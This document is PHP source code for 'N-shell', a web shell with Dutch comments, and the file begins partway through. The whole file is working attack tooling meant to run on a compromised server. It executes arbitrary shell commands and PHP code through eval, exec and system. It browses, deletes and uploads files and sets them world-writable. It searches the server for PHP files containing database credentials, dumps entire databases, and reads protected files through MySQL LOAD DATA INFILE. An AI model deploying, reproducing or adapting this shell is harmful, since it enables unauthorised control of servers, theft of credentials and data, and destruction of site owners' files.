";
if ($_GET['x_pwned'] == 'sql') { // sql-commando-lijn
echo "";
if(!(@mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']) && @mysql_select_db($_SESSION['data']))) { // sql connectie met sessies
if (isset($_POST['connect'])) {
if (empty ($_POST['host']) OR empty ($_POST['user']) OR empty ($_POST['pass']) OR empty ($_POST['data'])) {
echo " Kon geen connectie maken.";
} else {
$_SESSION['host'] = $_POST['host'];
$_SESSION['user'] = $_POST['user'];
$_SESSION['pass'] = $_POST['pass'];
$_SESSION['data'] = $_POST['data'];
echo " Database-connectie gelukt.";
echo " ";
}
}
echo '
';
} else if (mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']) && @mysql_select_db($_SESSION['data'])) {
if (isset($_POST['submit'])) {
if (mysql_query("{$_POST['command']}")) {
echo "
".$_POST['command']."is succesvol uitgevoerd.
";
} else {
echo " Commando kon niet uitgevoerd worden.";
}
echo "
";
}
echo "
";
}
} else if ($_GET['x_pwned'] == 'ftp') { // file editor, map browser, ...
/*if (isset($_GET['map'])) {
$map = $_GET['map'];
} else {
$map = ".";
}*/
echo "";
/*if ($handle = opendir($map)) {
while (false !== ($file = readdir($handle))) {
$index = explode("?",$_SERVER['REQUEST_URI']);
$files = explode(".",$file);
if ($files[1] == "") {
if (isset($_GET['map'])) {
$mp = $_GET['map'] . "/" . $file;
} else {
$mp = $file;
}
echo " " . $file . "";
} else {
echo " " . $file . "";
}
}
closedir($handle);
}*/
function dec_str($line, $len) {
if (strlen($line) > $len) {
$afgekort = substr($line, 0, $len) . "...";
} else {
$afgekort = $line;
}
return $afgekort;
}
function getalcheck($iGetal) {
$iNum = ($iGetal / 2);
$aNum = explode('.', $iNum);
if($aNum[1] == 5) {
$iEven = 0;
} else {
$iEven = 1;
}
return $iEven;
}
echo ' ';
if(!$_GET['map']){
echo ' | ';
} else {
echo '' . $_GET['map'] . ' | Terug | ';
}
echo ' | ';
if($_GET['map']){
echo '';
$map = $_GET['map'] . "*";
$files = glob($map);
if(!$files){
echo "Geen bestanden in deze map! | ";
} else {
foreach ($files as $f) {
$f = ereg_replace($_GET['map'], "", $f);
echo '';
$extensie = explode(".", $f);
if(strlen($extensie[1]) > 0){
// Geen bestanden laten zien he!
} else {
chmod($_GET['map'] . $f . "/", 0777);
if (is_writable($_GET['map'] . $f . "/")) {
$font = "";
$font_eind = "";
}
echo 'map | ';
echo '' . $font . dec_str($f, 35) . $font_eind . ' | [v] | ';
$bg++;
}
echo ' ';
}
$map = $_GET['map'] . "*";
$files = glob($map);
foreach($files as $f){
echo '';
$f2 = ereg_replace($_GET['map'], "", $f);
$extensie = explode(".", $f);
chmod($_GET['map'] . $f2, 0777);
if(strlen($extensie[1]) > 2){
echo 'file | ';
echo '' . dec_str($f2, 35) . ' | [d] - [b] - [v] | ';
}else{
// Geen bestanden laten zien he!
}
echo ' ';
}
}
echo " ";
} else {
echo '';
$files = glob("*");
foreach($files as $f){
echo '';
$extensie = explode(".", $f);
if(strlen($extensie[1]) > 0){
// Geen bestanden laten zien he!
} else {
chmod($f . "/", 0777);
if (is_writable($f . "/")) {
$font = "";
$font_eind = "";
}
echo 'map | ';
echo '' . $font . dec_str($f, 35) . $font_eind . ' | [v] | ';
$bg++;
}
echo ' ';
}
$files = glob("*.*");
foreach($files as $f){
echo '';
$extensie = explode(".", $f);
if(strlen($extensie[1]) > 2){
chmod($f, 0777);
echo 'file | ';
echo '' . dec_str($f, 35) . ' | [d] - [b] - [v] | ';
} else {
// Geen bestanden laten zien he!
}
echo ' ';
}
echo " ";
}
echo " | ";
if (isset($_GET['ver'])) { // files verwijderen
$file_delete = $_GET['ver'];
if (@unlink($file_delete) OR @rmdir($file_delete)) {
echo "" . dec_str($file_delete, 35) . " is succesvol verwijderd.";
} else {
echo "" . dec_str($file_delete, 35) . " kon niet verwijderd worden.";
}
} else if (isset($_GET['bew'])) { // nu: files bekijken; later: files bekijken/bewerken
function File_Scan($dir) {
$handle=opendir($dir);
while(($file=readdir($handle))!==FALSE) {
$point = $dir . $file;
if($file == $_GET['bew']){
$myFile = $point;
$fh = fopen($myFile, 'r');
$theData = fread($fh, filesize($myFile));
fclose($fh);
$ext = explode(".",$_GET['bew']);
if ($ext[1] == 'jpg' OR $ext[1] == 'png' OR $ext[1] == 'jpeg' OR $ext[1] == 'gif' OR $ext[1] == 'bmp') {
echo $_GET['bew'] . " ";
echo "";
} else {
echo "";
echo $_GET['bew'] . " ";
echo '';
echo "";
}
}
}
}
if ($_GET['map']) {
$dir = "./" . $_GET['map'];
} else {
$dir = "./";
}
File_Scan($dir);
} else { // files uploaden
if ($_POST['loadup']) {
if ($_GET['map']) {
$uploaddir = $_GET['map'];
} else {
$uploaddir = '';
}
$uploadfile = $uploaddir . $_FILES['upfile']['name'];
if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploadfile)) {
echo "File upload is gelukt.";
} else {
echo "File upload mislukt.";
}
}
echo '
';
// createdir
if ($_POST['dir']) {
if ($_GET['map']) {
$dirbefore = $_GET['map'];
} else {
$dirbefore = "./";
}
$totaldir = $dirbefore . $_POST['dirname'];
if (mkdir($totaldir, 0777)) {
echo "De map is succesvol aangemaakt.";
} else {
echo "Het aanmaken van de map is mislukt.";
}
}
echo '';
}
echo " |
";
echo " ";
} else if($_GET['x_pwned'] == 'scf') { // config finder
echo "";
// script zoekt naar files die string mysql_select_db bevatten zodat je in de SQL commandline kunt inloggen met de db gegevens
function scf($map) {
$handle = opendir($map);
while (false!==($file = readdir($handle))) {
if ($file != "." AND $file != "..") {
$file_map=$map."/".$file;
$extensie = explode(".", $file);
if ($extensie[1] == "php") {
$file2 = file_get_contents($file_map);
if(ereg("mysql_select_db",$file2) OR ereg("mysql_connect",$file2)) {
echo $file_map . " ";
$myFile = $file_map;
$fh = fopen($myFile, 'r');
$theData = fread($fh, filesize($myFile));
fclose($fh);
echo '
';
}
}
if(is_dir($file_map))
scf($file_map);
}
}
}
$map = ".";
scf($map);
echo " ";
} else if ($_GET['x_pwned'] == 'pma') { // phpmyadmin
// de functies die nodig zijn voor de phpmyadmin
function view_size($size) {
if (!is_numeric($size)) {
return FALSE;
} else {
if ($size >= 1073741824) {
$size = round($size/1073741824*100)/100 ." GB";
} elseif ($size >= 1048576) {
$size = round($size/1048576*100)/100 ." MB";
} elseif ($size >= 1024) {
$size = round($size/1024*100)/100 ." KB";
} else {
$size = $size . " B";
}
return $size;
}
}
function mysql_dump($set) {
global $shver;
$sock = $set["sock"];
$db = $set["db"];
$echo = $set["echo"];
$nl2br = $set["nl2br"];
$file = $set["file"];
$add_drop = $set["add_drop"];
$tabs = $set["tabs"];
$onlytabs = $set["onlytabs"];
$ret = array();
$ret["err"] = array();
if (!is_resource($sock)) {
echo("Error: \$sock is not valid resource.");
}
if (empty($db)) {
$db = "db";
}
if (empty($echo)) {
$echo = 0;
}
if (empty($nl2br)) {
$nl2br = 0;
}
if (empty($add_drop)) {
$add_drop = TRUE;
}
if (empty($file)) {
$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db.".sql";
}
if (!is_array($tabs)) {
$tabs = array();
}
if (empty($add_drop)) {
$add_drop = TRUE;
}
if (sizeof($tabs) == 0) {
// retrive tables-list
$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
if (mysql_num_rows($res) > 0) {
while ($row = mysql_fetch_row($res)) {
$tabs[] = $row[0];
}
}
}
$out = "
# Dumped by N-SHELL.SQL
# Homepage: n0tiz.be and hackers-project.info
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
# Date: ".date("d.m.Y H:i:s")."
# DB: \"".$db."\"
#---------------------------------------------------------
";
$c = count($onlytabs);
foreach($tabs as $tab) {
if ((in_array($tab,$onlytabs)) or (!$c)) {
if ($add_drop) {
$out .= "DROP TABLE IF EXISTS `".$tab."`;";
}
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
if (!$res) {
$ret["err"][] = mysql_smarterror();
} else {
$row = mysql_fetch_row($res);
$out .= $row["1"].";";
$res = mysql_query("SELECT * FROM `$tab`", $sock);
if (mysql_num_rows($res) > 0) {
while ($row = mysql_fetch_assoc($res)) {
$keys = implode("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {
$values[$k] = addslashes($v);
}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');";
$out .= $sql;
}
}
}
}
}
$out .= "
#---------------------------------------------------------
";
if ($file) {
$fp = fopen($file, "w");
if (!$fp) {
$ret["err"][] = 2;
} else {
fwrite ($fp, nl2br($out));
fclose ($fp);
}
}
if ($echo) {
if ($nl2br) {
echo nl2br($out);
} else {
echo nl2br($out);
}
}
return $out;
}
function mysql_buildwhere($array,$sep=" and",$functs=array()) {
if (!is_array($array)) {
$array = array();
}
$result = "";
foreach($array as $k=>$v) {
$value = "";
if (!empty($functs[$k])) {
$value .= $functs[$k]."(";
}
$value .= "'".addslashes($v)."'";
if (!empty($functs[$k])) {
$value .= ")";
}
$result .= "`".$k."` = ".$value.$sep;
}
$result = substr($result,0,strlen($result)-strlen($sep));
return $result;
}
function mysql_fetch_all($query,$sock) {
if ($sock) {
$result = mysql_query($query,$sock);
} else {
$result = mysql_query($query);
}
$array = array();
while ($row = mysql_fetch_array($result)) {
$array[] = $row;
}
mysql_free_result($result);
return $array;
}
function mysql_smarterror($type,$sock) {
if ($sock) {
$error = mysql_error($sock);
} else {
$error = mysql_error();
}
$error = htmlspecialchars($error);
return $error;
}
function mysql_query_form() {
global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {
if (!$sql_query_error) {
$sql_query_error = "Query was empty";
}
echo "Error: ".$sql_query_error." ";
}
if ($sql_query_result or (!$sql_confirm)) {
$sql_act = $sql_goto;
}
if ((!$submit) or ($sql_act)) {
echo " | ";
if ($tbl_struct) {
echo "Fields: ";
foreach ($tbl_struct as $field) {
$name = $field["Field"];
echo "?".$name." ";
}
echo " | ";
}
}
if ($sql_query_result or (!$sql_confirm)) {
$sql_query = $sql_last_query;
}
}
function mysql_create_db($db,$sock="") {
$sql = "CREATE DATABASE `".addslashes($db)."`;";
if ($sock) {
return mysql_query($sql,$sock);
} else {
return mysql_query($sql);
}
}
function mysql_query_parse($query) {
$query = trim($query);
$arr = explode (" ",$query);
$types = array(
"SELECT"=>array(3,1),
"SHOW"=>array(2,1),
"DELETE"=>array(1),
"DROP"=>array(1)
);
$result = array();
$op = strtoupper($arr[0]);
if (is_array($types[$op])) {
$result["propertions"] = $types[$op];
$result["query"] = $query;
if ($types[$op] == 2) {
foreach($arr as $k=>$v) {
if (strtoupper($v) == "LIMIT") {
$result["limit"] = $arr[$k+1];
$result["limit"] = explode(",",$result["limit"]);
if (count($result["limit"]) == 1) {
$result["limit"] = array(0,$result["limit"][0]);
}
unset($arr[$k],$arr[$k+1]);
}
}
}
} else {
return FALSE;
}
}
// einde functies phpmyadmin
// Sending headers
@ob_start();
@ob_implicit_flush(0);
$sort = htmlspecialchars($sort);
if (empty($sort)) {
$sort = $sort_default;
}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {
$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();
}
// einde sending headers
//Starting calls
function getmicrotime() {
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {
if (!function_exists("strips")) {
function strips(&$arr,$k="") {
if (is_array($arr)) {
foreach($arr as $k=>$v) {
if (strtoupper($k) != "GLOBALS") {
strips($arr["$k"]);
}
}
} else {
$arr = stripslashes($arr);
}
}
}
strips($GLOBALS);
}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {
if (!isset($$k)) {
$$k = $v;
}
}
//CONFIGURATION AND SETTINGS
if (!empty($unset_nurl)) {
setcookie("n-shell_nurl");
$nurl = "";
} elseif (!empty($set_nurl)) {
$nurl = $set_nurl;
setcookie("n-shell_nurl",$nurl);
} else {
$nurl = $_REQUEST["n-shell_nurl"]; //Set this cookie for manual nurl
}
$nurl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in nurl.
if ($nurl_autofill_include and !$_REQUEST["n-shell_nurl"]) {
$include = "&";
foreach (explode("&",getenv("QUERY_STRING")) as $v) {
$v = explode("=",$v);
$name = urldecode($v[0]);
$value = urldecode($v[1]);
foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
if (strpos($value,$needle) === 0) {
$includestr .= urlencode($name)."=".urlencode($value)."&";
}
}
}
if ($_REQUEST["nurl_autofill_include"]) {
$includestr .= "nurl_autofill_include=1&";
}
}
if (empty($nurl)){
$nurl = "?".$includestr; //Self url
}
$nurl = htmlspecialchars($nurl) . "x_pwned=pma&";
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
$sess_cookie = "n-shellshvars"; // Cookie-variable name
@$f = $_REQUEST["f"];
@extract($_REQUEST["n-shellshcook"]);
//END CONFIGURATION
echo "";
// phpmyadmin
echo " ";
$sql_surl = $surl;
if ($sql_login) {
$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);
}
if ($sql_passwd) {
$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);
}
if ($sql_server) {
$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);
}
if ($sql_port) {
$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);
}
if ($sql_db) {
$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);
}
$sql_surl .= "&";
echo '';
if ($sql_server) {
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
$err = mysql_smarterror();
@mysql_select_db($sql_db,$sql_sock);
if ($sql_query and $submit) {
$sql_query_result = mysql_query($sql_query,$sql_sock);
$sql_query_error = mysql_smarterror();
}
} else {
$sql_sock = FALSE;
}
if (!$sql_sock) {
if (!$sql_server) {
echo "Geen connectie";
} else {
echo "Kan geen connectie maken.";
echo $err;
}
} else {
$sqlquicklaunch = array();
$sqlquicklaunch[] = array("Index",$surl."sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
$sqlquicklaunch[] = array("Server-status",$surl."sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
$sqlquicklaunch[] = array("Server variables",$surl."sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - '".htmlspecialchars($sql_passwd)."') ";
if (count($sqlquicklaunch) > 0) {
foreach($sqlquicklaunch as $item) {
echo "".$item[0]." ";
}
}
}
echo " | ";
if (!$sql_sock) {
echo '";
} else {
//Start left panel
echo " | | ";
//End left panel
echo "";
echo '';
//Start center panel
$diplay = TRUE;
if ($sql_db) {
if (!is_numeric($c)) {
$c = 0;
}
if ($c == 0) {
$c = "no";
}
echo " There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").";
if (count($dbquicklaunch) > 0) {
foreach($dbsqlquicklaunch as $item) {
echo "[ ".$item[0]." ] ";
}
}
echo "";
$acts = array("","dump");
if ($sql_act == "tbldrop") {
$sql_query = "DROP TABLE";
foreach($boxtbl as $v) {
$sql_query .= "\n`".$v."` ,";
}
$sql_query = substr($sql_query,0,-1).";";
$sql_act = "query";
} elseif ($sql_act == "tblempty") {
$sql_query = "";
foreach($boxtbl as $v) {
$sql_query .= "DELETE FROM `".$v."` \n";
}
$sql_act = "query";
} elseif ($sql_act == "tbldump") {
if (count($boxtbl) > 0) {
$dmptbls = $boxtbl;
} elseif($thistbl) {
$dmptbls = array($sql_tbl);
}
$sql_act = "dump";
} elseif ($sql_act == "deleterow") {
$sql_query = "";
if (!empty($boxrow_all)) {
$sql_query = "DELETE * FROM `".$sql_tbl."`;";
} else {
foreach($boxrow as $v) {
$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";
}
$sql_query = substr($sql_query,0,-1);
}
$sql_act = "query";
} elseif ($sql_tbl_act == "insert") {
if ($sql_tbl_insert_radio == 1) {
$keys = "";
$akeys = array_keys($sql_tbl_insert);
foreach ($akeys as $v) {
$keys .= "`".addslashes($v)."`, ";
}
if (!empty($keys)) {
$keys = substr($keys,0,strlen($keys)-2);
}
$values = "";
$i = 0;
foreach (array_values($sql_tbl_insert) as $v) {
if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {
$values .= $funct." (";
}
$values .= "'".addslashes($v)."'";
if ($funct) {
$values .= ")";
}
$values .= ", "; $i++;
}
if (!empty($values)) {
$values = substr($values,0,strlen($values)-2);
}
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
$sql_act = "query";
$sql_tbl_act = "browse";
} elseif ($sql_tbl_insert_radio == 2) {
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
$result = mysql_query($sql_query) or print(mysql_smarterror());
$result = mysql_fetch_array($result, MYSQL_ASSOC);
$sql_act = "query";
$sql_tbl_act = "browse";
}
}
if ($sql_act == "query") {
echo "";
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {
if (!$sql_query_error) {
$sql_query_error = "Query was empty";
}
echo " Error: ".$sql_query_error." ";
}
if ($sql_query_result or (!$sql_confirm)) {
$sql_act = $sql_goto;
}
if ((!$submit) or ($sql_act)) {
echo " ";
}
}
if (in_array($sql_act,$acts)) {
echo ' ';
if (!empty($sql_act)) {
echo "";
}
if ($sql_act == "newtbl") {
echo " ";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
echo "DB '".htmlspecialchars($sql_newdb)."' has been created with success!";
} else {
echo "Can't create DB '".htmlspecialchars($sql_newdb)."'. Reason: ".mysql_smarterror();
}
} elseif ($sql_act == "dump") {
if (empty($submit)) {
$diplay = FALSE;
echo " ";
} else {
$diplay = TRUE;
$set = array();
$set["sock"] = $sql_sock;
$set["db"] = $sql_db;
$dump_out = "download";
$set["echo"] = 0;
$set["nl2br"] = 0;
$set[""] = 0;
$set["file"] = $dump_file;
$set["add_drop"] = TRUE;
$set["onlytabs"] = array();
if (!empty($dmptbls)) {
$set["onlytabs"] = explode(";",$dmptbls);
}
$ret = mysql_dump($set);
if ($sql_dump_savetofile) {
$fp = fopen($sql_dump_file,"w");
if (!$fp) {
echo " Dump error! Can't write to '".htmlspecialchars($sql_dump_file)."'!";
} else {
fwrite($fp,$ret);
fclose($fp);
echo "Dumped! Dump has been writed to '".htmlspecialchars(realpath($sql_dump_file))."'.";
}
} else {
echo "Dumped! Dump has been writed to '".htmlspecialchars(realpath($sql_dump_file))."'.";
}
}
}
if ($diplay) {
if (!empty($sql_tbl)) {
if (empty($sql_tbl_act)) {
$sql_tbl_act = "browse";
}
$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
$count_row = mysql_fetch_array($count);
mysql_free_result($count);
$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
$tbl_struct_fields = array();
while ($row = mysql_fetch_assoc($tbl_struct_result)) {
$tbl_struct_fields[] = $row;
}
if ($sql_ls > $sql_le) {
$sql_le = $sql_ls + $perpage;
}
if (empty($sql_tbl_page)) {
$sql_tbl_page = 0;
}
if (empty($sql_tbl_ls)) {
$sql_tbl_ls = 0;
}
if (empty($sql_tbl_le)) {
$sql_tbl_le = 30;
}
$perpage = $sql_tbl_le - $sql_tbl_ls;
if (!is_numeric($perpage)) {
$perpage = 10;
}
$numpages = $count_row[0]/$perpage;
$e = explode(" ",$sql_order);
if (count($e) == 2) {
if ($e[0] == "d") {
$asc_desc = "DESC";
} else {
$asc_desc = "ASC";
}
$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
} else {
$v = "";
}
$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
$result = mysql_query($query) or print(mysql_smarterror());
echo "Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)";
echo " [ Browse ] ";
echo " [ Insert ] ";
if ($sql_tbl_act == "structure") {
echo " Coming sooon!";
}
if ($sql_tbl_act == "insert") {
if (!is_array($sql_tbl_insert)) {
$sql_tbl_insert = array();
}
if (!empty($sql_tbl_insert_radio)) {
} else {
echo " Inserting row into table:";
if (!empty($sql_tbl_insert_q)) {
$sql_query = "SELECT * FROM `".$sql_tbl."`";
$sql_query .= " WHERE".$sql_tbl_insert_q;
$sql_query .= " LIMIT 1;";
$result = mysql_query($sql_query,$sql_sock) or print(" ".mysql_smarterror());
$values = mysql_fetch_assoc($result);
mysql_free_result($result);
} else {
$values = array();
}
echo " ";
}
}
if ($sql_tbl_act == "browse") {
$sql_tbl_ls = abs($sql_tbl_ls);
$sql_tbl_le = abs($sql_tbl_le);
echo "";
$b = 0;
for($i=0;$i<$numpages;$i++) {
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {
echo " ";
}
echo $i;
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {
echo "";
}
if (($i/30 == round($i/30)) and ($i > 0)) {
echo " ";
} else {
echo " ";
}
}
if ($i == 0) {
echo "empty";
}
echo " ";
echo " ";
}
} else {
$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
if (!$result) {
echo mysql_smarterror();
} else {
echo " ";
mysql_free_result($result);
}
}
}
}
} else {
$acts = array("");
if (in_array($sql_act,$acts)) {
echo "Welkom op de phpmyadmin-clone van n0tiz (n-shell).
";
}
if (!empty($_GET['sql_act'])) {
if ($_GET['sql_act'] == "newdb") {
echo " ";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
echo "DB '".htmlspecialchars($sql_newdb)."' has been created with success!";
} else {
echo "Can't create DB '".htmlspecialchars($sql_newdb)."'. Reason: ".mysql_smarterror();
}
}
// serverstatus
if ($_GET['sql_act'] == "serverstatus"){
$result = mysql_query("SHOW STATUS", $sql_sock);
echo " Server-status variables: ";
echo "Name | Value | ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
echo "".$row[0]." | ".$row[1]." | ";
}
echo "
";
mysql_free_result($result);
}
// servervariabelen
if ($_GET['sql_act'] == "servervars") {
$result = mysql_query("SHOW VARIABLES", $sql_sock);
echo " Server variables: ";
echo "Name | Value | ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
echo "".$row[0]." | ".$row[1]." | ";
}
echo "
";
mysql_free_result($result);
}
if ($_GET['sql_act'] == "getfile") {
$tmpdb = $sql_login."_tmpdb";
$select = mysql_select_db($tmpdb);
if (!$select) {
mysql_create_db($tmpdb);
$select = mysql_select_db($tmpdb);
$created = !!$select;
}
if ($select) {
$created = FALSE;
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
mysql_query("LOAD DATA INFILE '".addslashes($sql_getfile)."' INTO TABLE tmp_file");
$result = mysql_query("SELECT * FROM tmp_file;");
if (!$result) {
echo " Error in reading file (permision denied)!";
} else {
for ($i=0;$i File '".$sql_getfile."' does not exists or empty! ";
} else {
echo "File '".$sql_getfile."': ".nl2br(htmlspecialchars($f))." ";
}
mysql_free_result($result);
mysql_query("DROP TABLE tmp_file;");
}
}
mysql_drop_db($tmpdb); //comment it if you want to leave database
}
}
}
}
echo " ";
echo " | ";
echo " |
";
echo " ";
} else if ($_GET['x_pwned'] == 'exec') { // php executer
echo "";
eval(stripslashes($_POST['php']));
echo " ";
}
echo "";
echo "";
} else if ($_GET['x_pwned'] == "cmd") {
echo "";
$cmd = $_POST['cmd'];
function myshellexec($cmd) {
global $disablefunc;
$result = "";
if (!empty($cmd)) {
if (is_callable("exec")) {
exec($cmd,$result);
$result = join("\n",$result);
} else if (($result = $cmd) !== FALSE) {
} else if (is_callable("system")) {
$v = @ob_get_contents();
@ob_clean();
system($cmd);
$result = @ob_get_contents();
@ob_clean();
echo $v;
} else if (is_callable("passthru")) {
$v = @ob_get_contents();
@ob_clean();
passthru($cmd);
$result = @ob_get_contents();
@ob_clean();
echo $v;
} else if (is_resource($fp = popen($cmd,"r"))) {
$result = "";
while(!feof($fp)) {
$result .= fread($fp,1024);
}
pclose($fp);
}
}
return $result;
}
@chdir($chdir);
if (isset($_POST['submit'])) {
echo "Result of execution this command:";
$olddir = realpath(".");
@chdir($d);
$ret = myshellexec($cmd);
$ret = convert_cyr_string($ret,"d","w");
if ($cmd_txt) {
$rows = count(explode("\r\n",$ret))+1;
if ($rows < 10) {$rows = 10;}
echo "
";
} else {
echo "
";
}
@chdir($olddir);
} else {
echo "Result of execution this command";
echo "
";
if (empty($cmd_txt)) {
$cmd_txt = TRUE;
}
}
echo " ";
echo "";
} else if (!isset($_GET['x_pwned']) OR $_GET['x_pwned'] == 'home' OR !$_GET['x_pwned']){
echo "Welcome on N-shell, the second dutch shell.
Made by n0tiz and FiLEFUSiON.
Shouting @ DaiMoNtoR, Flux, Fox, Inspiratio, Rienkrules, Killing-Devil, and all the others...
Signed for Rienkrules, FiLEFUSiON, kapiteinkoek, Inspiratio and DaiMoNtoR : ";
}
echo " |